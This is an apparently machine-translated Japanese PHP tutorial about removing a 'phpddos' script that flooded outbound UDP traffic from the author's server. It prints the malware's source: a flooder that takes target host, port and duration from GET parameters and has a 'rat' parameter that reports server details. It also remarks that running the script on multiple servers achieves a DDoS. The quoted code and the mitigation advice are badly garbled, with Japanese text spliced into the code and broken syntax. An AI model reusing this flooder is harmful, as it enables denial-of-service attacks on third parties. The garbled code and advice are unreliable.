phpddos 攻撃 (サーバーが外部ネットワークに大量のデータパケットを送信する) の解決策

phpddos 攻撃 (サーバーが外部ネットワークに大量のデータパケットを送信する) の解決策_PHP チュートリアル

WBOY

リリース： 2016-07-20 11:10:29

オリジナル

1410 人が閲覧しました

今日、私のマシンの 1 台が突然、1 秒あたり 1G を超える大量のデータパケットを外部に送信しました。UDP パケットを禁止するポリシーを使用していたため、送信できませんでしたが、大量のデータパケットが送信されました。お金が足りないので、ついに解決する方法を見つけました。

まずソースコードを見てください

外部にリクエストするためにfsockopenを使用しているので、彼にリクエストさせないでくださいそれを設定してくださいphp.ini

コードは次のとおりです

コードをコピーしてください

set_time_limit(999999);
$host = $_GET['host'];
$ port = $_GET['port '];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)= =0 または StrLen($port ) == 0 または Strlen ($ exec_time) == 0) {
if (
_ Get ['Rat']) & lt; gt; {

echo $ _get ['ネズミ']. "]."|".GetHostByName($_SERVER

['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat' ]; exit}

$ max_time = time（）+$ exec_time; （ "udp：// $ host"、$ port、$ errno、$ errstr、5）; /1024=" .round($Sendlen/1024, 2) . ")kb / 1024 = " .

round($packets*$Sendlen/1024/1024, 2) . " mb

" ;

echo "送信レート:" .round($packets/$exec_time, 2) .round($packets/

$Sendlen/1024/1024, 2) . s";
?>

キーコードは

コードは次のとおりです

コードをコピーしてください

$fp = fsockopen("udp://$ip", $rand , $errno, $errstr, 5);

方法は非常に簡単で、UDP パケットをターゲットホストに送信し、上記の無限ループの定義により、より大きな圧力が発生します。

このスクリプトを実行するサーバーは最初に独自のネットワーク帯域幅、CPU、その他のリソースを大量に消費するため、この負荷がかかります。

このスクリプトを使用してターゲットサイトに圧力をかけたい場合は、複数のサーバー、DDOSでスクリプトを実行する必要があります

コードは次のとおりですallow_url_fopen = Offそうであれば、パッケージを送信できます